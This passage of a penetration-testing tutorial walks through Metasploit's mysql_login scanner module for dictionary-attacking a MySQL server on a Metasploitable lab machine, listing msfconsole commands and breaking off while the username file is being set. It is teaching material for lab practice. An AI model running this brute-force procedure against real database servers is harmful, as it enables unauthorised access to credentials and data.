Metasploitable MySQL
In this recipe, we will explore how to use Metasploit to attack a MySQL database server using the MySQL Scanner module. Being the database of choice for many website platforms, including Drupal and Wordpress, many websites are currently using the MySQL database server. This makes it an easy target for the Metasploitable MySQL attack!
Getting ready
The following requirement needs to be fulfilled:
A connection to the internal network
Metasploitable running in our hacking lab
Wordlist to perform dictionary attack
How to do it...
Let's begin our MySQL attack by opening a terminal window:
Open a terminal window.
Launch the MSFCONSOLE:
msfconsoleSearch for all the available MySQL modules:
search mysql
Use the MySQL Scanner module:
use auxiliary/scanner/mysql/mysql_login
Show the available options of the module:
show options
Set
RHOSTto the host of your Metasploitable 2 machine or target:set RHOST 192.168.10.111Set your username file location. This is a user file list of your choice...
